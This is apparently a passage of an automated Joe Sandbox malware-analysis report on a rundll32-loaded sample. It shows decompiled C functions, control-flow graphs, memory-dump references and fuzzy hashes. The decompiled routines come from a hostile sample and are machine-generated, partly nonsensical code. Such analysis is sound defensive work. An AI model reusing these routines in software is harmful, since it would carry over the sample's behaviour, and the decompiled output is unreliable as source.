                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9dc96f86dbbaa20c8ef60299b3bed7d9e93c288ee7591700e430430b411c89c3
                                                                                                                                                                                                                                    • Instruction ID: ae7d01078ecc1e38965d4add754ef48473de8ac4976c522a8f0c3f0462e92108
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dc96f86dbbaa20c8ef60299b3bed7d9e93c288ee7591700e430430b411c89c3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8214879600218BFCB15DFA4D888DCEBBBDEF8D750B1584A5F906DB240D7319A41CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B83B7, Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 516 31b83b7-31b8406 518 31b8479-31b847e 516->518 519 31b8408-31b8419 516->519 521 31b841b-31b843b call 31b2049 519->521 522 31b8470 519->522 526 31b843d-31b8447 521->526 527 31b8466 521->527 522->518 529 31b844c-31b844e 526->529 528 31b846f 527->528 528->522 530 31b8460-31b8461 call 31b9039 529->530 531 31b8450-31b845f call 31b5544 529->531 530->527 531->530
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 18b35e47a76f57fff8adf18d76cabefa3de850c179e554b87cc717721a5a27b3
                                                                                                                                                                                                                                    • Instruction ID: aa805fbe065065f7887ae2ea1aa0520121719696c31485770243346962209fd8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18b35e47a76f57fff8adf18d76cabefa3de850c179e554b87cc717721a5a27b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6221E5B6A00218FBDB11EF95CC85ADEBFBDEB0CB50F104066F904B6114E7719A459BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B43DF, Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 535 31b43df-31b43ef call 31b2049 538 31b4495-31b4498 535->538 539 31b43f5-31b440c 535->539 540 31b449d-31b449f 538->540 541 31b4413-31b4418 539->541 542 31b448a-31b4493 call 31b9039 541->542 543 31b441a-31b443d 541->543 542->540 547 31b443f-31b4458 543->547 548 31b447e 543->548 552 31b445a-31b4470 547->552 553 31b4472-31b447c 547->553 549 31b4482-31b4488 548->549 549->542 551 31b449a 549->551 551->540 552->549 553->548
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E031B43DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
				signed int _v8;
				void* _t19;
				signed int _t21;
				intOrPtr _t22;
				intOrPtr* _t26;
				signed int _t27;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t51;

				_t51 = E031B2049(_t19, 0xc);
				if(_t51 == 0) {
					_t21 = 8;
				} else {
					_t22 =  *0x31bd27c; // 0x1faa5a8
					_t1 = _t22 + 0x31be058; // 0x5168600
					_t2 = _t22 + 0x31be028; // 0x2df01
					_t24 =  *0x31bd15c(_t2, 0, 4, _t1, _t51); // executed
					_v8 = _t24;
					if(_t24 < 0) {
						L8:
						E031B9039(_t24, _t51);
						_t21 = _v8;
					} else {
						_t43 =  *0x31bd27c; // 0x1faa5a8
						_t26 =  *_t51;
						_t4 = _t51 + 4; // 0x4
						_t35 = _t4;
						_t5 = _t43 + 0x31be048; // 0xd30c1661
						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
						_v8 = _t27;
						_t28 =  *_t51;
						_t40 =  *_t28;
						if(_t27 < 0) {
							L6:
							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
						} else {
							_t45 =  *0x31bd27c; // 0x1faa5a8
							_t7 = _t51 + 8; // 0x8
							_t49 = _t7;
							_t8 = _t45 + 0x31be068; // 0x2df05
							_t29 =  *_t40(_t28, _t8, _t49);
							_v8 = _t29;
							if(_t29 < 0) {
								_t30 =  *_t35;
								 *((intOrPtr*)( *_t30 + 8))(_t30);
								_t28 =  *_t51;
								_t40 =  *_t28;
								goto L6;
							} else {
								_t32 =  *_t49;
								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
								_t24 = _a4;
								_a4 = _a4 & 0x00000000;
								 *_a4 = _t51;
							}
						}
						if(_v8 >= 0) {
							_t21 = _a4;
						} else {
							goto L8;
						}
					}
				}
				return _t21;
			}



















                                                                                                                                                                                                                                    0x031b43eb
                                                                                                                                                                                                                                    0x031b43ef
                                                                                                                                                                                                                                    0x031b4497
                                                                                                                                                                                                                                    0x031b43f5
                                                                                                                                                                                                                                    0x031b43f5
                                                                                                                                                                                                                                    0x031b43fb
                                                                                                                                                                                                                                    0x031b4406
                                                                                                                                                                                                                                    0x031b440d
                                                                                                                                                                                                                                    0x031b4415
                                                                                                                                                                                                                                    0x031b4418
                                                                                                                                                                                                                                    0x031b448a
                                                                                                                                                                                                                                    0x031b448b
                                                                                                                                                                                                                                    0x031b4490
                                                                                                                                                                                                                                    0x031b441a
                                                                                                                                                                                                                                    0x031b441a
                                                                                                                                                                                                                                    0x031b4420
                                                                                                                                                                                                                                    0x031b4426
                                                                                                                                                                                                                                    0x031b4426
                                                                                                                                                                                                                                    0x031b442a
                                                                                                                                                                                                                                    0x031b4432
                                                                                                                                                                                                                                    0x031b4434
                                                                                                                                                                                                                                    0x031b4439
                                                                                                                                                                                                                                    0x031b443b
                                                                                                                                                                                                                                    0x031b443d
                                                                                                                                                                                                                                    0x031b447e
                                                                                                                                                                                                                                    0x031b447f
                                                                                                                                                                                                                                    0x031b443f
                                                                                                                                                                                                                                    0x031b443f
                                                                                                                                                                                                                                    0x031b4445
                                                                                                                                                                                                                                    0x031b4445
                                                                                                                                                                                                                                    0x031b4449
                                                                                                                                                                                                                                    0x031b4451
                                                                                                                                                                                                                                    0x031b4455
                                                                                                                                                                                                                                    0x031b4458
                                                                                                                                                                                                                                    0x031b4472
                                                                                                                                                                                                                                    0x031b4477
                                                                                                                                                                                                                                    0x031b447a
                                                                                                                                                                                                                                    0x031b447c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b445a
                                                                                                                                                                                                                                    0x031b445a
                                                                                                                                                                                                                                    0x031b4461
                                                                                                                                                                                                                                    0x031b4467
                                                                                                                                                                                                                                    0x031b446a
                                                                                                                                                                                                                                    0x031b446e
                                                                                                                                                                                                                                    0x031b446e
                                                                                                                                                                                                                                    0x031b4458
                                                                                                                                                                                                                                    0x031b4488
                                                                                                                                                                                                                                    0x031b449a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b4488
                                                                                                                                                                                                                                    0x031b4418
                                                                                                                                                                                                                                    0x031b449f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f255b6a658bf3b59b73ef1e3fb1640216cee8d7a3babc70b6c6bfb1b488cce1b
                                                                                                                                                                                                                                    • Instruction ID: 588eb183230708dfc400085bf4f4208621069f5624248316dfbf5798b9b2167f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f255b6a658bf3b59b73ef1e3fb1640216cee8d7a3babc70b6c6bfb1b488cce1b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2137B9600204EFD714DFA5D888F9AB3B9FF8D704F208598E645CB251DB71EA45CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B8504, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E031B8504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				char _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t23;
				void* _t28;
				void* _t35;
				char _t38;
				intOrPtr _t40;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x31bd340; // 0x5168d39
				_push(0x800);
				_push(0);
				_push( *0x31bd238);
				if( *0x31bd24c >= 5) {
					__imp__();
					if(__eax == 0) {
						L6:
						_t28 = 8;
						L7:
						if(_t28 != 0) {
							L10:
							 *0x31bd24c =  *0x31bd24c + 1;
							L11:
							return _t28;
						}
						_t42 = _a4;
						_t38 = _v8;
						 *_a16 = _a4;
						 *_a20 = E031B2496(_a4, _t38); // executed
						_t18 = E031BA66E(_t35, _t38, _t42); // executed
						if(_t18 != 0) {
							 *_a8 = _t38;
							 *_a12 = _t18;
							if( *0x31bd24c < 5) {
								 *0x31bd24c =  *0x31bd24c & 0x00000000;
							}
							goto L11;
						}
						_t28 = 0xbf;
						E031BA1B0();
						__imp__( *0x31bd238, 0, _t38); // executed
						goto L10;
					}
					_t23 = E031BA279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
					L5:
					_t28 = _t23;
					goto L7;
				}
				__imp__(); // executed
				if(__eax == 0) {
					goto L6;
				}
				_t23 = E031B8B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
				goto L5;
			}











                                                                                                                                                                                                                                    0x031b8507
                                                                                                                                                                                                                                    0x031b8508
                                                                                                                                                                                                                                    0x031b8512
                                                                                                                                                                                                                                    0x031b8519
                                                                                                                                                                                                                                    0x031b851e
                                                                                                                                                                                                                                    0x031b8520
                                                                                                                                                                                                                                    0x031b8526
                                                                                                                                                                                                                                    0x031b8546
                                                                                                                                                                                                                                    0x031b854e
                                                                                                                                                                                                                                    0x031b8566
                                                                                                                                                                                                                                    0x031b8568
                                                                                                                                                                                                                                    0x031b8569
                                                                                                                                                                                                                                    0x031b856b
                                                                                                                                                                                                                                    0x031b85a9
                                                                                                                                                                                                                                    0x031b85a9
                                                                                                                                                                                                                                    0x031b85af
                                                                                                                                                                                                                                    0x031b85b5
                                                                                                                                                                                                                                    0x031b85b5
                                                                                                                                                                                                                                    0x031b856d
                                                                                                                                                                                                                                    0x031b8573
                                                                                                                                                                                                                                    0x031b8576
                                                                                                                                                                                                                                    0x031b8585
                                                                                                                                                                                                                                    0x031b8587
                                                                                                                                                                                                                                    0x031b858e
                                                                                                                                                                                                                                    0x031b85c2
                                                                                                                                                                                                                                    0x031b85c7
                                                                                                                                                                                                                                    0x031b85c9
                                                                                                                                                                                                                                    0x031b85cb
                                                                                                                                                                                                                                    0x031b85cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b85c9
                                                                                                                                                                                                                                    0x031b8590
                                                                                                                                                                                                                                    0x031b8595
                                                                                                                                                                                                                                    0x031b85a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b85a3
                                                                                                                                                                                                                                    0x031b855d
                                                                                                                                                                                                                                    0x031b8562
                                                                                                                                                                                                                                    0x031b8562
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8562
                                                                                                                                                                                                                                    0x031b8528
                                                                                                                                                                                                                                    0x031b8530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b853f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 29eed12872a73471c228b9cbf3e65d54f113933e34bcc9f04e5de255b59ba01f
                                                                                                                                                                                                                                    • Instruction ID: eccda63066740bcc4866be82f1c52bb67e0f97aa8f5439959a2d4f9debe9f480
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29eed12872a73471c228b9cbf3e65d54f113933e34bcc9f04e5de255b59ba01f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7421097A600244AFDB19EF59E884ADA77BCEF4D754F044066F9019B240EB70EA858BB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B1A70, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 556 31b1a70-31b1a84 557 31b1a89-31b1a8e 556->557 558 31b1b25-31b1b2c 557->558 559 31b1a94-31b1a97 557->559 560 31b1a99-31b1aae 559->560 561 31b1ab1-31b1ab4 559->561 560->561 561->558 562 31b1ab6-31b1abb 561->562 564 31b1b18-31b1b23 562->564 565 31b1abd-31b1acf 562->565 564->558 568 31b1b0f-31b1b14 565->568 569 31b1ad1-31b1ade 565->569 568->564 569->568 571 31b1ae0-31b1aee call 31b2049 569->571 574 31b1aff 571->574 575 31b1af0-31b1afd call 31b5544 571->575 577 31b1b06 574->577 575->577 577->568
                                                                                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                                                                                    			E031B1A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t46;

				_push( &_v12);
				_push(__eax);
				_t37 = 0;
				_t44 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					__imp__(0xc8);
					_push( &_v12);
					_push(__eax);
					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
				}
				if(_v8 >= _t37) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							__imp__(_v16);
							_t44 = _t31;
							if(_t44 != 0) {
								_t44 = _t44 + 1;
								_t46 = _t44 + _t44;
								_t37 = E031B2049(_t31, _t46);
								if(_t37 == 0) {
									_v8 = 0x8007000e;
								} else {
									_push(_t46);
									_push(_v16);
									_push(_t37);
									L031B5544();
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t37;
					 *_a8 = _t44 + _t44;
				}
				goto L13;
			}













                                                                                                                                                                                                                                    0x031b1a80
                                                                                                                                                                                                                                    0x031b1a81
                                                                                                                                                                                                                                    0x031b1a82
                                                                                                                                                                                                                                    0x031b1a84
                                                                                                                                                                                                                                    0x031b1a86
                                                                                                                                                                                                                                    0x031b1a8b
                                                                                                                                                                                                                                    0x031b1a8e
                                                                                                                                                                                                                                    0x031b1b25
                                                                                                                                                                                                                                    0x031b1b2c
                                                                                                                                                                                                                                    0x031b1b2c
                                                                                                                                                                                                                                    0x031b1a97
                                                                                                                                                                                                                                    0x031b1a9e
                                                                                                                                                                                                                                    0x031b1aa9
                                                                                                                                                                                                                                    0x031b1aaa
                                                                                                                                                                                                                                    0x031b1aae
                                                                                                                                                                                                                                    0x031b1aae
                                                                                                                                                                                                                                    0x031b1ab4
                                                                                                                                                                                                                                    0x031b1ab6
                                                                                                                                                                                                                                    0x031b1abb
                                                                                                                                                                                                                                    0x031b1ac4
                                                                                                                                                                                                                                    0x031b1acc
                                                                                                                                                                                                                                    0x031b1acf
                                                                                                                                                                                                                                    0x031b1ad4
                                                                                                                                                                                                                                    0x031b1ada
                                                                                                                                                                                                                                    0x031b1ade
                                                                                                                                                                                                                                    0x031b1ae0
                                                                                                                                                                                                                                    0x031b1ae1
                                                                                                                                                                                                                                    0x031b1aea
                                                                                                                                                                                                                                    0x031b1aee
                                                                                                                                                                                                                                    0x031b1aff
                                                                                                                                                                                                                                    0x031b1af0
                                                                                                                                                                                                                                    0x031b1af0
                                                                                                                                                                                                                                    0x031b1af1
                                                                                                                                                                                                                                    0x031b1af4
                                                                                                                                                                                                                                    0x031b1af5
                                                                                                                                                                                                                                    0x031b1afa
                                                                                                                                                                                                                                    0x031b1b09
                                                                                                                                                                                                                                    0x031b1b09
                                                                                                                                                                                                                                    0x031b1ade
                                                                                                                                                                                                                                    0x031b1b0f
                                                                                                                                                                                                                                    0x031b1b15
                                                                                                                                                                                                                                    0x031b1b15
                                                                                                                                                                                                                                    0x031b1b1e
                                                                                                                                                                                                                                    0x031b1b23
                                                                                                                                                                                                                                    0x031b1b23
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 72df179ae56ec8c1aa5228294541ad67d977c0796a1139091e6dcc857e8f2773
                                                                                                                                                                                                                                    • Instruction ID: d63df26f121fbd245c79e84ff334c5d8ea555f6366b7f3e0c3e4104bcfea5de7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72df179ae56ec8c1aa5228294541ad67d977c0796a1139091e6dcc857e8f2773
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1212C79A00209FFCB10DFA8D998DDEBBB9FF4D311B1541A9E905E7214E7309A45CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B924F, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e8fc08b9c7b22cef3ada1414bf898ba12e9bc8dae07196c667b3c769bff892d0
                                                                                                                                                                                                                                    • Instruction ID: 0efd7f5938b930c99b0914738769aa24f74f3fdc73e3c4f65c8bb9be86cacb89
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8fc08b9c7b22cef3ada1414bf898ba12e9bc8dae07196c667b3c769bff892d0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2213D7590025DFFEB05EFA4DC84EEEBB79EB4C304F0400A5EA10A61A1D7719A45EF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B1B2F, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5776fc433a87395c661ff5b2235371ffcbf0f90c7a1ffefd94c91a3e136133eb
                                                                                                                                                                                                                                    • Instruction ID: 74c55faab1711741283c3934b072b23dd44ecbd44e1be9456583af572409bddc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5776fc433a87395c661ff5b2235371ffcbf0f90c7a1ffefd94c91a3e136133eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B21C07A600204BBC729EBA8DD05FDA77BDAF8C750F264161F605EB280E77099418BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B3D0D, Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E031B3D0D(intOrPtr* _a4, void* _a8) {
				void _v31;
				char _v32;
				void* _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t40;

				_t25 = 6;
				_v32 = 0;
				memset( &_v31, 0, _t25 << 2);
				_t26 = 0;
				asm("stosw");
				asm("stosb");
				_t31 = 0; // executed
				_t17 = E031B83B7( *0x31bd258,  &_v32); // executed
				if(_t17 != 0 && _v31 > 2) {
					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
					_t26 = 0;
					if(_t23 > 0) {
						do {
							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
							_t26 = _t26 + 1;
						} while (_t26 < _t23);
					}
				}
				_t39 = _t31;
				 *0x31bd270 = _t31;
				if(_t31 != 0) {
					L8:
					_t19 = E031B924F( &_a8); // executed
					__eflags = _t19;
					if(_t19 == 0) {
						__eflags = _a8 - 0x1000;
						if(_a8 == 0x1000) {
							goto L10;
						}
					}
				} else {
					_t21 = E031B7923(_t26, _t39);
					_t40 =  *0x31bd270; // 0xd448b889
					 *_a8 = _t21;
					if(_t40 != 0) {
						goto L8;
					} else {
						if(_t21 == 0) {
							L10:
							_push(5);
							_pop(0);
						} else {
							 *_a4 = 1;
							 *0x31bd270 = _t21;
						}
					}
				}
				return 0;
			}














                                                                                                                                                                                                                                    0x031b3d18
                                                                                                                                                                                                                                    0x031b3d1d
                                                                                                                                                                                                                                    0x031b3d23
                                                                                                                                                                                                                                    0x031b3d23
                                                                                                                                                                                                                                    0x031b3d25
                                                                                                                                                                                                                                    0x031b3d27
                                                                                                                                                                                                                                    0x031b3d32
                                                                                                                                                                                                                                    0x031b3d34
                                                                                                                                                                                                                                    0x031b3d3b
                                                                                                                                                                                                                                    0x031b3d47
                                                                                                                                                                                                                                    0x031b3d4a
                                                                                                                                                                                                                                    0x031b3d4e
                                                                                                                                                                                                                                    0x031b3d50
                                                                                                                                                                                                                                    0x031b3d50
                                                                                                                                                                                                                                    0x031b3d54
                                                                                                                                                                                                                                    0x031b3d55
                                                                                                                                                                                                                                    0x031b3d50
                                                                                                                                                                                                                                    0x031b3d4e
                                                                                                                                                                                                                                    0x031b3d59
                                                                                                                                                                                                                                    0x031b3d5b
                                                                                                                                                                                                                                    0x031b3d61
                                                                                                                                                                                                                                    0x031b3d89
                                                                                                                                                                                                                                    0x031b3d8d
                                                                                                                                                                                                                                    0x031b3d92
                                                                                                                                                                                                                                    0x031b3d94
                                                                                                                                                                                                                                    0x031b3d96
                                                                                                                                                                                                                                    0x031b3d9d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3d9d
                                                                                                                                                                                                                                    0x031b3d63
                                                                                                                                                                                                                                    0x031b3d63
                                                                                                                                                                                                                                    0x031b3d68
                                                                                                                                                                                                                                    0x031b3d71
                                                                                                                                                                                                                                    0x031b3d73
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3d75
                                                                                                                                                                                                                                    0x031b3d77
                                                                                                                                                                                                                                    0x031b3d9f
                                                                                                                                                                                                                                    0x031b3d9f
                                                                                                                                                                                                                                    0x031b3da1
                                                                                                                                                                                                                                    0x031b3d79
                                                                                                                                                                                                                                    0x031b3d7c
                                                                                                                                                                                                                                    0x031b3d82
                                                                                                                                                                                                                                    0x031b3d82
                                                                                                                                                                                                                                    0x031b3d77
                                                                                                                                                                                                                                    0x031b3d73
